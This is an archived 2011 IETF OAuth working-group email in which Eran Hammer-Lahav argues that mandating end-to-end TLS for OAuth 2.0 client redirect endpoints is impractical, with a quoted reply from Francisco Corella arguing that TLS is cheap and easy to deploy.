<one long rant adding no value to this conversation>

Speaking from current, on-going, firsthand experience building an OAuth 2.0 
server and client.

Your questions about deploying TLS are the least significant when it comes to 
deploying a TLS-based client. I know these are the standard argument people 
make when defending a requirement to use TLS, but in practice they are almost 
meaningless.

The problem is that no modern web application is built and deployed using a 
single provider or served from a single server (or servers controlled by a 
single entity). Take every popular blog for example, and you'll find at least 5 
add-ons hosted by other services and loaded by the client: an analytics tool, 
one or more ad networks, some site navigation components, hosted comments, and 
on and on.

If *any* of these scripts loaded by the client at any time during an 
authenticated session are not using TLS, not only will the browser show some 
scary UX warning about incomplete HTTPS state, but also , a MITM will be able, 
with the exact same ease, to hijack the session just like the attack raised 
here. If the client is a JS-based OAuth client, add to that stealing the 
in-memory access token.

TLS performance sucks!

No, I'm not talking about the technology - I'm talking about the kind deployed 
widely on the web. There are no widely available CDNs for TLS at the same price 
and performance as are for HTTP. It is still hard-to-impossible to find 
high-performance free TLS hosts for most popular JS toolkits like JQuery and 
YUI. Loading these (big) script packages from the TLS servers available is 
simply too slow to be used in any practical web application. Ads are another 
major issue.

I've spent the past three months building an OAuth 2.0 client. I've gone 
through the same analysis and realized that I had to use TLS end-to-end in 
order to protect the MAC secret issued to the client with its access token. 
This has caused significant pains as we had to figure out solutions for every 
third party service or script we use. We had to give up on using the analytics 
package we wanted because they didn't have a fast enough solution for TLS-based 
pages (it works great for content sites where there isn't a lot of fast 
interaction or reliance on 'onload' activity).

I can go on for hours. This has been an awful experience, and not for a minute 
because of paying $100 for a cert or installing it in nginx. That took less 
than an hour.

I'm tired of having argument with people quoting theories. I work in the real 
world, and the real world is just not ready for end-to-end TLS deployment. 
Maybe it's sad, but that's life. No one wants to put user's at risk, but the 
only way to prevent it is to shut the web down.

This debate is just like talking about highway safety. We know how to make 
driving 100% safe. Everyone will drive tanks at no faster than 10mph, or 
alternatively, no one will drive and we'll all climb on converter belts to get 
anywhere (each bubble wrapped and put into a medically induced coma to make 
sure we don't move around). But in the real world, practical considerations 
trump 100% guarantees.

By just offering services online you put users at some risk. If you want 100% 
safe online banking, just don't offer any.

We must do better, and we should push security as hard as we can. But if you 
push beyond what is currently reasonable, you will get nowhere and maybe even 
do more harm. Facebook, Google, Yahoo, Kiva, etc. can easily force our 
developers to use TLS for the redirection endpoint. And the developers who 
really want to use our services will figure out how to deploy TLS and get it 
working. But as soon as these developers try to use other services not ready 
for end-to-end TLS, they result will be poor user experience.

In other words, no one will use those clients - they will suck.

It will be the safest web no one ever uses.

Awesome!

EHL


From: Francisco Corella [mailto:fcore...@pomcor.com]
Sent: Monday, April 04, 2011 5:35 PM
To: Eran Hammer-Lahav; Skylar Woodward; Phil Hunt; Oleg Gryb; David Recordon
Cc: OAuth WG
Subject: Re: [OAUTH-WG] Authorization code security issue (reframed)

David,

> If this is changed to a MUST, Facebook will be in violation of the
> specification moving forward. It is untenable to require all of our
> *client* developers to implement TLS endpoints though we certainly
> support developers who wish to do so. This is very different than
> offerring our entire API (and now site as opt-in) over TLS as the
> server.

Why is it untenable?  Is it because of the cost of a
certificate?  Many CAs offer certifcates for less $100, and
there are free certificates.  See
http://en.wikipedia.org/wiki/Comparison_of_SSL_certificates_for_web_servers.
Is it because of the cost of hosting an SSL site?  You can
have your own virtual server at Amazon for $14 a month.  Is
it because of the inconvenience of having to spend a few
hours getting a certificate and adding SSL to your site?

And how about putting your users and your data at risk?  Is
that tenable?

Francisco


_______________________________________________
OAuth mailing list
OAuth@ietf.org
https://www.ietf.org/mailman/listinfo/oauth

Reply via email to